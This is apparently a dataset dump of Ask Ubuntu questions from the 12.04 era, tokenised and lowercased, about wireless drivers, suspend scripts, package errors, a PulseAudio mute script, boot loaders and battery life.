180560	wireless doesnt work on a broadcom bcm4312 for hp/compaq laptop	i have bcm4312 in compaq presario v3033au laptop and installed ubuntu 12.04 ( kernel 3.5.0-10-generic ) as dual boot along side with windows xp . wireless is not detected and after some search i have commands now to make it work in the following way modprobe -r b43 bcma modprobe -r brcmsmac sudo modprobe b43 i tried blacklisting the bcma and brcmsmac from loading during start , by adding the following in blacklist.conf ( last line in the file ) . blacklist brcmsmac blacklist bcma but the above changes did n't help me and every time i restart my laptop , i have to execute the above commands to make my wireless network work . p.s : this post is linked to wireless does n't work on a broadcom bcm4312 , but i am not able to add my post there . so starting a new thread .
180564	radeon hd5670 hangs after login	thanks in advance for your advices . i installed , ubuntu 12.04 today , on my pc with a radeon hd5670 graphics card . the first error i encountered , ( just like the first time unity came out - after witch i waited to try ubuntu again until now ) is , that it hanged after login at the desktop wallpaper , with only the mouse cursor . well actually the first problem was with the live cd , but i managed to install it , using the install now , not the try now . live cd has the same problem , as after install . so , after installing and getting the error , i searched of course before asking this : ) i found this : ubuntu hangs at purple screen the accepted answer there helped me to get to this . ( note , that the below picture is a screen taken from a working desktop , and then erased the parts that do n't show on mine . ) note that there is nothing at the top except the brown bar . no shutdown button , no nothing . the system hangs , i ca n't click on anything , i can only wiggle around with my mouse xd
180568	installing ubuntu on an imac	i want to buy an imac 21 '' but also an fan of ubuntu ( linux in general ) . will ubuntu work seamlessly on an imac ?
180571	suspend not properly working with asus .	i have tried tons of solutions to fix suspen on asus , but none of them seem to help . i have tried the answer from here , which does n't help.this script seemed to work on ubuntu 11.10 but not on 12.04 . # ! /bin/sh # file : `` /etc/pm/sleep.d/20_custom-ehci_hcd '' . case `` $ { 1 } '' in hibernate|suspend ) # unbind ehci_hcd for first device 0000:00:1a.0 : echo -n `` 0000:00:1a.0 '' | tee /sys/bus/pci/drivers/ehci_hcd/unbind # unbind ehci_hcd for second device 0000:00:1d.0 : echo -n `` 0000:00:1d.0 '' | tee /sys/bus/pci/drivers/ehci_hcd/unbind ; ; resume|thaw ) # bind ehci_hcd for first device 0000:00:1a.0 : echo -n `` 0000:00:1a.0 '' | tee /sys/bus/pci/drivers/ehci_hcd/bind # bind ehci_hcd for second device 0000:00:1d.0 : echo -n `` 0000:00:1d.0 '' | tee /sys/bus/pci/drivers/ehci_hcd/bind ; ; esac with these answers now , all i every got on resume was either a black or a white screen with mouse . then i added nolapic on the grub_cmdline_linux_default which seemed to help a little because it resumed to my original state with mouse but the system becomes unresponsive . i had to do a sysrq to safely restart my pc . if it helps , i 'm on ubuntu 12.04 . kernel 3.2.0-30-generic-pae . asus x52f . intel p6100 and 2gb ram .
180572	why did ubuntu remove spidermonkey package ?	i noticed ubuntu did n't support spidermonkey since 10.04 . i guess it may have something to do with license . can you tell me the reason why ?
180573	have the repositories been shortened ?	i just sudo apt-get updated my repos and it took in total , 5 seconds to get everything . it usually takes 2/3 minutes . have the repos been shortened ?
180574	how to play embedded midi audio in pdf file ?	i 'm on ubuntu 11.04 and using adobe reader 9 . when i click on the embedded file link in the pdf file i get a dialogue box saying multimedia player finder : the media requires an additional player . please click 'get media player ' to download the correct media player . to play the media , you will need to close and restart the application once the player is complete . when i click on get media player the dialogue box closes but nothing further happens . i have looked at this question : play audio that are embedded in pdf file and downloaded realplayer but still continue to get the same problem . i have also installed timidity without any result . if it would help to use some other pdf reader that will allow me this functionality then i would be happy to do that as an alternative as well . all help gratefully received .
180576	how do i disable media players indicators integration ?	i recently moved from win7 to a linux distro so im not sure how exactly things work . what i found weird is while playing music with banshee and after hitting the `` x '' ( close ) button , the music that was playing in banshee didnt stop ( i also tested this with beatbox getting the same result ) . does this have anything to do with mprisv2 and is there a way to fix this ? for the record im using ubuntu 12.04 + gnome 3.4 + gnome shell + gnome-extensions-mediaplayer-indicator
180581	installing libwww-perl on ubuntu 12.04 , se	i have an ubuntu 12.04 server edition which i ssh into . i am running perl scripts on this server but it fails when i load 'use lwp : :useragent ; ' with error message : ca n't locate lwp/useragent.pm in @ inc ( @ inc contains : /home/hermann/scripts/modules/ /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl . ) at 1_standalone line 5 . begin failed -- compilation aborted at 1_standalone line 5 . so in order to fix that i am trying to install lwp : :useragent , which i am told is by : sudo apt-get install libwww-perl but when i run that command i get the following error : failed to fetch http : //is.archive.ubuntu.com/ubuntu/pool/main/libf/libfont-afm-perl/libfont-afm-perl_1.20-1_all.deb size mismatch failed to fetch http : //is.archive.ubuntu.com/ubuntu/pool/main/libh/libhtml-tagset-perl/libhtml-tagset-perl_3.20-2_all.deb size mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? now i have tried doing sudo apt-get update , which appears to run fine but does n't change anything . and i have also done 'sudo apt-get install libwww-perl -- fix-missing ' , which also fails . how do i install libwww-perl ?
180583	burning ubuntu iso onto a cd	i 've downloaded ubuntu-12.04.1-desktop-amd64.iso via chrome . once that was done , i wanted to burn it onto a cd but i ca n't find the .iso file . when i opened the downloads folder , the .iso extension is not there anymore , and it opens with winrar for unzipping . i tried unzipping and searching for any iso files but no luck . i 'm trying to add ubuntu onto virtualbox on windows 7 host os . please help .
180590	music not in sequential order with banshee	i was looking in to banshee media player as a all in one music / video player , and in general it works great ( even hd films ) , except for one very annoying thing my music is not listed by track number or any kind of file system that i can see , it just seems to list the tracks in a random order . this is very annoying as many albums play in a preferred order and some just sound wrong played in a random order , this is also true of the videos playlist as this is not listed alphabetically making navigation difficult . i finished using rhythm box for the same reason years ago and used amarok instead which did not have the issue . so i am asking if anyone else has this issue ? or knows a fix ? , also is this a gtk issue as amarok works fine but is a kde app ?
180591	keyboard freezes in terminal after sudo	when entering sudo commands into the terminal on a regular install ( i.e . not virtualbox ) , the terminal asks for password , but keyboard becomes unresponsive in terminal . it is fine in other applications , so seems particular to the terminal after sudo commands . any ideas ? jim .
180592	how to deactivate multitouch on a thinkpad x220/x230 tablet ?	when writing with the stylus pen ( in for example xournal ) the multitouch function is very annoying : when i place my writing hand on the display it produces random lines and figures . so i would like to ( temporary ) deactivate ( multi ) touch completely , so that only the stylus pen is accepted for input . is there any command that does this ?
180594	resume to login screen after suspend	i have managed to change keyboard shortcuts to use the login screen instead of the lock screen , see this question . however , after i suspend the computer and wake it up again , i get the lock screen . how can i resume to the login screen after suspend ? this is on 12.04 , classic gnome session .
180595	memtest86 : has my ram gone bad ?	i did a memory test with memtest86 on boot , and i 'm seeing this : is my ram defective ? ps : my ubuntu pc does n't boot . shows options in grub and then says there are errors in / and failed loading /tmp . my hard-drive was replaced with a new one and i still get this . so i was wondering if it 's the memory that needs replacement .
180596	can i install ubuntu on my windows 7	i want to install ubuntu . is it safe to dual boot my computer with windows 7 and ubuntu ? if yes , please send me the information on how to do that .
180598	e : method /usr/lib/apt/methods/	when i try to install something from ubuntu software center or synaptic , a message pops up saying e : method /usr/lib/apt/methods/ did not start correctly after cleaning apt , updating etc , the problem persists . i did n't find nothing strange on my sources.list . i 'm running ubuntu 12.04 . what could be causing this error ?
180607	close , minimize and maximize buttons randomly moved sides	i turned my ubuntu on this morning and for no reason the close , max and min buttons moved from the left side of the window to the right ! ! ! i do n't know why but this happened to every theme ( which is loads ) on the pc . any one else had this ? , or know a fix ? cheers
180608	huawei ec122 modem recognized but not connecting in ubuntu 12.04	first time trying to use any os other than windows , really looking forward to learning more ... buuut ... am in the process of installing ubuntu on my acer netbook , and in the installation need to have the internet connected , as recommended . i 'm in tanzania , and have no access to internet other than my portable huawei ec122 3g usb modem . in ubuntu , i 've set up the broadband network , it recognizes my device , i set up the profile , it prompts for password , but all that happens is after a few seconds of trying to connect , the message `` network is now disconnected '' shows up - when i go to manage my networks it notes `` never '' under `` last time connected '' , so it 's not connecting and disconnecting right away , it 's just not picking up t signal somewhow , though the modem itself is transmitting the proper light signals that it 's picking up a signal , and is obviously working fine when i switch back to windows . anyone familiar with this problem and hopefully a solution ? really appreciate it , since i do n't know how to navigate any of the root menus .
180609	system suggest for powermac g4	processor : 400 mhz ( ppc 7400 ) ram : 768 mb pc133 ( +1 gb swap on hdd ) graphics : 256 mb his ati radeon 9550 128bit hdd : 80 gb 7200rpm seagate ata monitor : 1680x1050 lcd i want to use ubuntu but proccessor is too slow . graphic card is good for unity 3d ( i tested it on another computer ) . ram 's capacity is enough to ubuntu . which system you suggest me ? lubuntu 12.04 or ubuntu 12.04
180610	file permissions	some years/versions ago i found a script that took the directory group/permissions of the current folder for new files sub-folders currently when i import photographs into 12.04 using shotwell , i have to use terminal to issue : chgrp photography *.jpg . this enables other ubuntu members of 'photography ' group to add these files to their version of shotwell . i find modifying the folder properties/permissions will not set the group on 'apply permissions to enclosed files '
180612	script to mute an application	my goal is to be able to mute the spotify application , not the entire system . using the command : ps -c spotify -o pid= i am able to find the process id of spotify , in this case the id is `` 22981 '' . with that process id i would like to search from this list : pacmd list-sink-inputs . that command returns a list like this : eric @ eric-desktop : ~ $ pacmd list-sink-inputs welcome to pulseaudio ! use `` help '' for usage information . > > > 1 sink input ( s ) available . index : 0 driver : < protocol-native.c > flags : start_corked state : running sink : 1 < alsa_output.pci-0000_00_1b.0.analog-stereo > volume : 0 : 100 % 1 : 100 % 0 : -0.00 db 1 : -0.00 db balance 0.00 muted : no current latency : 1019.80 ms requested latency : 371.52 ms sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo resample method : ( null ) module : 8 client : 10 < spotify > properties : media.role = `` music '' media.name = `` spotify '' application.name = `` spotify '' native-protocol.peer = `` unix socket client '' native-protocol.version = `` 26 '' application.process.id = `` 22981 '' application.process.user = `` eric '' application.process.host = `` eric-desktop '' application.process.binary = `` spotify '' window.x11.display = `` :0 '' application.language = `` en_us.utf-8 '' application.process.machine_id = `` 058c89ad77c15e1ce0dd5a7800000012 '' application.process.session_id = `` 058c89ad77c15e1ce0dd5a7800000012-1345692739.486413-85297109 '' application.icon_name = `` spotify-linux-512x512 '' module-stream-restore.id = `` sink-input-by-media-role : music '' now i would like to correlate the application.process.id = `` 22981 '' to the sink input index which in this case is index : 0 . now with that index number i would then need to to run this command : pacmd set-sink-input-mute 0 1 to mute spotify and pacmd set-sink-input-mute 0 0 to unmute spotify . for those commands , the first number would need to be replaced with the index number found earlier , and the next number is the boolean to turn on or off the mute . how can i put this altogether into a script , so i can get a command to mute/unmute the spotify application ? edit : both of the scripts below work as expected , can somebody add a toggle which would check muted : yes or muted : no and then mute or unmute accordingly ? edit : i was able to modify glenn jackman 's script to add the toggle : # ! /bin/bash main ( ) { local action=toggle while getopts : mu option ; do case `` $ option '' in m ) action=mute ; ; u ) action=unmute ; ; ? ) usage 1 `` invalid option : - $ optarg '' ; ; esac done shift $ ( ( optind - 1 ) ) local pid= $ ( pidof `` $ 1 '' ) if [ [ -z `` $ pid '' ] ] ; then echo `` error : no running processes for : $ 1 '' > & 2 elif [ [ `` $ 1 '' ] ] ; then $ action `` $ 1 '' else usage 1 `` specify an application name '' fi } usage ( ) { [ [ `` $ 2 '' ] ] & & echo `` error : $ 2 '' echo `` usage : $ 0 [ -m | -u ] appname '' echo `` default : toggle mute '' echo `` arguments : '' echo `` -m = mute application '' echo `` -u = unmute application '' exit $ 1 } toggle ( ) { local status= $ ( get_status `` $ 1 '' ) if [ [ `` $ status '' == `` yes '' ] ] ; then unmute `` $ 1 '' elif [ [ `` $ status '' == `` no '' ] ] ; then mute `` $ 1 '' fi } mute ( ) { adjust_muteness `` $ 1 '' 1 ; } unmute ( ) { adjust_muteness `` $ 1 '' 0 ; } adjust_muteness ( ) { local index= $ ( get_index `` $ 1 '' ) local status= $ ( get_status `` $ 1 '' ) [ [ `` $ index '' ] ] & & pacmd set-sink-input-mute `` $ index '' $ 2 > /dev/null } get_index ( ) { local pid= $ ( pidof `` $ 1 '' ) pacmd list-sink-inputs | awk -v pid= $ pid ' $ 1 == `` index : '' { idx = $ 2 } $ 1 == `` application.process.id '' & & $ 3 == `` \ '' '' pid `` \ '' '' { print idx ; exit } ' } get_status ( ) { local pid= $ ( pidof `` $ 1 '' ) pacmd list-sink-inputs | awk -v pid= $ pid ' $ 1 == `` muted : '' { idx = $ 2 } $ 1 == `` application.process.id '' & & $ 3 == `` \ '' '' pid `` \ '' '' { print idx ; exit } ' } main `` $ @ ''
180615	why is ubuntu detecting only one processor core ?	my processor is intel p6100 which is a dual core processor . when i do cat /proc/cpuinfo this is what get varun @ varun-k52f : ~ $ cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 6 model : 37 model name : intel ( r ) pentium ( r ) cpu p6100 @ 2.00ghz stepping : 5 microcode : 0x2 cpu mhz : 1999.000 cache size : 3072 kb physical id : 0 siblings : 1 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 11 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm pcid popcnt lahf_lm arat dtherm bogomips : 3990.07 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : why does it show only 1 core ? edit : output of cat /proc/cpuinfo | grep -i processor | wc -l is also 1 `
180617	uninstall grub and plymouth	i have questions about plymouth and grub . my problem with plymouth is that it is ugly and slow . which , as far has i know , is the opposite of what it should be . is there any way to remove ( not disable , i tried and it did n't work ) plymouth ? or if i ca n't , is there any linux distro without plymouth , which is easy to use ? i thought about debian , but it probably is for more experienced users than me . my problem with grub is that i do n't need it . oh , and it is also ugly . but that is not the prime point . i want to use the windows boot manager as my boot manager to manage my windows 7-linux dual-boot . when i installed 12.04 , creating a /boot partition , when i selected ubuntu in windows boot manager , it did n't booted directly to ubuntu , but grub appeared first . if anybody wants to see which tutorial i consulted , here is the link . what i want is that , if i select ubuntu , i want it to boot quickly and without grub ( or i would n't spend my time finding a way to use windows boot manager instead of grub ) , just like windows . if there 's no solution , can anybody tell me about some distro without grub and plymouth ? or at least that i can install without grub ?
180622	is installing lxde in ubuntu is equivalent to installing a fresh copy of lubuntu ?	is installing lxde in ubuntu is equivalent to installing a fresh copy of lubuntu ? my computer is 2005 made , intel d 101 processor with 512 mb ram and 80 gb hard disk . dual boot with xp . i feel a bit slow and have ubuntu with lxde desktop now .
180624	i have downloaded 12.04 but i can not install it . how to do it ?	i have downloaded 12.04 . i am using windows xp and i want to install ubuntu in xp , but the problem is i am not able to start the ubuntu installation process . i downloaded ubuntu from ubuntu.com only . what i downloaded is n't an iso image , it was a zip folder , and when i unzipped it , i found many folders in there , but there was n't any .iso image in it . so now how am i supposed to install ubuntu ?
180625	how to change login wallpaper ?	so , say my wallpaper is a picture of my family or something , or a picture of a flower . but , when i log in , i do n't want my family/flower to show on the log in screen but instead be something separate . is there a possible way to do this ? like , say , this is my desktop image : but for my log in screen , i would have to have this ( but i want the flower , and then the woven speaker thing for the log in screen ? ) : thanks in advance ,
180627	installing ubuntu alongside windows 7 question	i want to install ubuntu . i have windows 7 already installed . if i install with wubi , will the windows boot manager always show up every time i start up the computer , so that i can choose between windows 7 and ubuntu ? thanks .
180628	how can i logout from the gui using cli ?	i chose an openbox de at the time of login and the system took ages to load the de . so i switched to cli ( ctrl+alt+f1 ) and rebooted my system ( but i wanted to logout from the gui and not restart the whole system ) . my question is , can i issue some command at cli to log me out from the gui so that i can select different de . ( i do n't want to restart my system every-time de hangs . ) $ display=:0 gnome-session-quit -- force ** ( gnome-session-quit:3144 ) : warning ** : failed to call logout : the name org.gnome.sessionmanager was not provided by any .service files
180629	flash problem after installed nvidia	a few days ago i install nvidia xserver because i have a monitor ( dele207wfp ) with was saw with maximum resolution 1024x740 , and i read that on xserver is possible to write own monitor configuration . i write that driver with tutorial : http : //ubuntuforums.org/showpost.php ? p=12937 , and this works ( but a shape are little blurred ) . i restarted my computer and than when i go to youtube i can see any video i now i do n't know how to do with this , my only idea is to uninstall xserver , but i need it to use monitor , without nvidia driver the screen size is 1024 rather than 1650 and this makes it impossible to work .
180633	vmware library not saving	i installed vmware player yesterday into ubuntu 12.04 . it is vmware player 5.0.0. on top of ubuntu 12.04 . my problem is the fact the library refuses to save upon reboot . i start a fresh library upon every reboot . is there a way to keep the library upon reboot ?
180635	vlc package dependencies can not be resolved	when i try to install vlc media player this pops up : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.3-0ubuntu0.12.04.1 ) but 2.0.3-0ubuntu0.12.04.1 is to be installed depends : libavcodec-extra-53 ( > = 4:0.8-1~ ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.8-1~ ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed depends : libva-x11-1 ( > 1.0.15~ ) but it is not going to be installed depends : libva1 ( > 1.0.15~ ) but it is not going to be installed depends : libxcb-composite0 but it is not going to be installed depends : libxcb-randr0 ( > = 1.1 ) but it is not going to be installed depends : libxcb-xv0 ( > = 1.2 ) but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed can someone please tell me what this means ? how can i get around it ? ( if possible ) p.s . i am also receiving similar pop ups when trying to install most programs . i am using ubuntu 12.04 64-bit . any help will be much appreciated .
180637	cropping videos to perfectly fit youtube 16:9 dimensions with pitivi or kdenlive ?	i 'm using recordmydesktop to generate videos for some tutorials and i 've tried using quite a lot of video editing programs but have n't been able to get these videos to fit perfectly into the youtube dimensions ( without the black margins ) . how can i do this without losing video quality ? some more info that might help running ffmpeg -i on the files returns the following : stream # 0.1 : video : theora , yuv420p , 944x512 [ par 1:1 dar 59:32 ] , 30 fps , 30 tbr , 30 tbn , 30 tbc - although i have various files , each with different dimensions . i 've tried the following editors : kdenlive , pitivi , avidemux & cinelerra ( i prefer the first 2 ) .
180639	request about description regarding cpuinfo	hi we all know that cat /proc/cpuinfo will provide us , but my request is i want to know the description about all the fields over there . i am giving you my pc information here . i think its not off topic and this is a helpful post . raja @ badfox : ~ $ cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 15 model : 6 model name : intel ( r ) pentium ( r ) d cpu 3.00ghz stepping : 5 cpu mhz : 2400.000 cache size : 2048 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 6 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pebs bts pni dtes64 monitor ds_cpl est cid cx16 xtpr pdcm lahf_lm bogomips : 5983.43 clflush size : 64 cache_alignment : 128 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 15 model : 6 model name : intel ( r ) pentium ( r ) d cpu 3.00ghz stepping : 5 cpu mhz : 2400.000 cache size : 2048 kb physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 6 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pebs bts pni dtes64 monitor ds_cpl est cid cx16 xtpr pdcm lahf_lm bogomips : 5983.51 clflush size : 64 cache_alignment : 128 address sizes : 36 bits physical , 48 bits virtual power management : raja @ badfox : ~ $ i know some of them like cpu type and core etc . , but mention the description for all .
180652	what chemistry software are there for ubuntu ?	i am looking into organic chemistry and would like to know , if there are any packages that can help me to visualize better . topics that i am interested in : covalend bonds hybridization resonance structure isomers
180659	sharing between new install and windows 7 boxes not working , either direction . printers & folders	i do n't seem to be able to share between my ubuntu ( fresh install ) and any of my windows machines . i tried using this guide : how to share folders in ubuntu & access them from windows 7 . the problems is that i can not see the ubuntu machine in my network pane on the windows machine . any ideas of what i should check ? ultimately what i am looking to do is make mobile media server that i can put in the van , attach a wifi router , and stream to an ipad , tablet , laptop , etc . any advice on setting this up would be appreciated .
180663	how do i give back to the ubuntu community ?	i made a switch to ubuntu about 3 years ago and i 'm more than happy with it . as it is free , i feel it 's not right unless i give back something to the community . what are the ways in which i could give back to the ubuntu community ?
180664	what is sweet home 3d and how to install it ?	i am currently using sweet home 3d for modeling my home . it will be nice if someone adds in more detail about this software and how to install in on ubuntu . also is it possible to change the units from meters to square feet ?
180668	how to check the security of system ?	is there any antivirus or any sort of scanner available for linux so that one can insure the security of system and is it so that ubuntu is hack-proof ? if not than what are the basic steps which a new ubuntu user keep in mind for security concern .
180669	user password rejected on login screen but accepted on text console login	i had to force shutdown my ubuntu 12.04 64-bit , after which i restarted and tried to log in as a normal user , which was rejected several times . i then logged in as guest and tty to my regular account with use of my normal password , which succeeded . ( so the password is still valid . ) how can i gain access again via the normal login procedure ( welcome screen ) ? update : when i tried to log on with my new password , it again was denied . when i deliberately tried to log on with a faulty password , an error message came back , saying : access denied - wrong password . i suppose , the first time the password was not rejected , but the procedure was aborted for some reason . some additional info after trying to find a solution : i am conviced it is a compiz-issue . why ? before this happened , all sessions came to a grinding halt , regardless of being logged on in a 2d or 3d environment . i found a link saying that i should remove compiz and proceed in a 2d environment , which initiall worked without a glitch , until my system went into a state of total obivium . only after that , the above mentioned troubles appeared . in the meantime i have happened to find a thread with reference 17381 , describing exactly what i have experienced . for now , i will try to cure this situation ( later this week ) and revert with the results , hopefully to close this post . in the meantime i cordially thank you all , even if you did n't kill the problem ; you gave me the inspiration to look further and find a possible cure . update2 : after 15 hrs of trial-and-error i callled it quits ( when i decided to tackle this problem , i 've given myself 12 hrs , to avoid massive loss of time . ) i decided to re-install precise , since the `` point 1 '' version has become availabe . log-in is back to normal , as is the graphic environment . response to mouse input is stil appalling , especially when i have a series of screens open as `` children '' of a `` parent '' screen . it still completely locks up . i have installed enlightenment , gnome classic , gnome 3 , cinnamon and they all behave in a similar fashion . for those who need a way-out in situations of the like : open a terminal with [ ctrl+alt+f2 ] . type [ sudo killall firefox ] ( or whatever application you wish to terminate ) . key in your password . return to your graphical screen with [ ctrl+alt+f7 ] , and bob 's your uncle . just re-open firefox like nothing happened . next time you are stuck : [ ctrl+alt+f2 ] , upward arrow till you meet the command of your desire , [ ctrl+alt+f7 ] , etcetera . hope this is of help . my next move will be to upgrade the kernel to 3.4 from the repositories for 12.10 . however , since this entails a totally new situation , i will start a new thread on this site to avoid topic pollution i will keep you posted . still .
180681	specific short battery life problem with sony vaio laptop	( i 'm using ubuntu 12.04 lts 64 bit ) i have some problems with my laptop 's ( sony vaio vpc-f22s1e ) battery . it 's fullly charging about 3-4 hours ( while using ) and 2-3 hours ( when shutdowned ) . and it 's duration is only 1-2 hours . after 2 hours using , it 's completely empty ( actually i 'm praising , if it longer for 2 hours ) . also , i 'm checking ubuntu 's remaining battery time panel , as you see , it says 1 hour 39 minutes . but when i check it 10 minutes later , it 's 1 : 09 , and 20 minutes later 1 : 35 . as you see , it 's very unstable . i went to sony 's technical service . they measure somethings and tell me `` battery 's all values are normal , there is no problem with your battery '' . this is my battery details : i 'm not sure why there is a problem . details ( command > results of command ) lspci | grep vga > 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 ) my pc usage details i 'm not playing games on my pc ( seriously ) i 'm a web developer , and always working with text editors ( sublime text 2 ) apache2 web server always online on my computer , but i 'm not sure how much battery using bluetooth always disabled . i 'm using wireless network connection , always . ( please comment , if you need other details ) what i need ? advices for finding problem with my battery finding my battery drainer applications , and kill them . advices for charging ( for example , should i use voltage protected power socket ? and should n't i use my computer while charging it ) why it 's not duplicated with other questions . because every computer user different , installed different applications , using at different places and users have different computer knowledge ( i 'm not a linux expert because of this i need step by step answers , generally ) . done a quick search but could n't find any enough information about my problem . beause of this , i 'm asking this question . please do n't tell me `` it 's duplicated with blah blah blah , close this question ! '' . thank you : ) about ( sony vaio vpc-f22s1e ) the graphics chip , hd graphics 3000 , in the processor is disabled ( no nvidia optimus ) . the geforce gt 540m can therefore not be disabled .
180684	can i have more than one operating system ?	i have a new laptop with windows xp . i want to install ubuntu but i want to have both operating systems : ubuntu and windows xp . what can i do ?
180687	i need help on starting up 12.04 on my computer	i have just downloaded 12.04 windows installer . i managed to boot up 12.04 once but it seems like , after i shutdown the computer , i can no longer access 12.04 . when i boot the computer , it prompts me to to either boot windows 7 or ubuntu . i choose ubuntu , it then starts up but displays a menu , called grub i think , prompting me to choose ubuntu 12.04 or ubuntu 12.04 recovery . when i choose either , it says i have to load the kernel or something all those lines . i have never used any form of linux before so i struggle to understand what to do . please help .
180699	how can i tell ubuntu fix my ram disk as non-pageable ?	i 'd like to make sure that the memory allocated for a ram disk never gets paged to a hdd . how can it be done in ubuntu ?
180701	wmp600n keeps disconnecting	i recently upgraded my aging 802.11b wireless card to a wmp600n . i bought this as i had read that it worked with linux . it did indeed work out of the box but the problem is that it stops working after a few minutes . no more traffic flows over the network . just trying to ping my router results in a destination host unreachable message . the syslog shows no indication that there has been any problem . the only way to address this is to reconnect to the wireless network using the network dropdown beside the clock . this high frequency of disconnection makes the system effectively unusable . i have a dual-boot ubuntu/windows 7 system and the network connection is stable in windows indicating that it is not an inherent problem with the hardware . diagnostic information here is some diagnostic information . the output in the syslog when i reconnect to the wireless network is quite verbose so i have pasted it elsewhere . i did n't spot anything that hinted at the cause of the problem : http : //pastebin.com/p3h8jh72 /var/log/kern.log contents ( although this looks like it already exists in the syslog output above ) : http : //paste.ubuntu.com/1168884/ output from dmesg : http : //paste.ubuntu.com/1168888/ output from iwconfig : lo no wireless extensions . wlan1 ieee 802.11abgn essid : '' bthomehub2-z924 '' mode : managed frequency:2.437 ghz access point : 00:24:17:64 : b0 : e1 bit rate=52 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=44/70 signal level=-66 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:1020 invalid misc:69 missed beacon:0 eth0 no wireless extensions . output from ifconfig wlan1 : wlan1 link encap : ethernet hwaddr 98 : fc:11 : e3:8a:51 inet addr:192.168.1.68 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :9afc:11ff : fee3:8a51/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6729 errors:0 dropped:0 overruns:0 frame:0 tx packets:6399 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5345413 ( 5.3 mb ) tx bytes:977231 ( 977.2 kb ) output from lshw -c network : *-network description : ethernet interface product : ar8121/ar8113/ar8114 gigabit or fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : b0 serial : 00:24:8c:29 : a1 : de capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1e driverversion=1.0.0.7-napi firmware=l1e latency=0 link=no multicast=yes port=twisted pair resources : irq:46 memory : fe8c0000-fe8fffff ioport : cc00 ( size=128 ) *-network description : wireless interface product : rt2800 802.11n pci vendor : ralink corp. physical id : 1 bus info : pci @ 0000:06:01.0 logical name : wlan1 version : 00 serial : 98 : fc:11 : e3:8a:51 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.2.0-29-generic firmware=0.34 ip=192.168.1.68 latency=64 link=yes maxlatency=4 mingnt=2 multicast=yes wireless=ieee 802.11abgn resources : irq:17 memory : febf0000-febfffff from what i can find out , the card uses a ralink rt2860 chip but ubuntu is using an rt2800 driver : burhan @ ubuntu : ~ $ lsmod | grep rt2800 rt2800pci 18715 0 rt2800lib 58925 1 rt2800pci crc_ccitt 12667 1 rt2800lib rt2x00pci 14577 1 rt2800pci rt2x00lib 51144 3 rt2800pci , rt2800lib , rt2x00pci mac80211 506816 3 rt2800lib , rt2x00pci , rt2x00lib eeprom_93cx6 12725 1 rt2800pci things i have tried i have downloaded the rt2860 linux drivers from the ralink website but they are dated july 2010 and their instructions are non-trivial so i have n't attempted to use them yet . related questions rt2800 wireless keeps disconnecting ( unanswered ) possibly related : wireless suddenly dropping with a ralink rt2870
180705	clicking on link opens blank firefox window	i 'm using firefox 14 . when i click a link outside the browser it opens a new firefox window showing google.com ( my home page ) . i have tried setting into xdg-settings set default-web-browser firefox.desktop but that does not seems working . please suggest anything possible for this problem thanks .
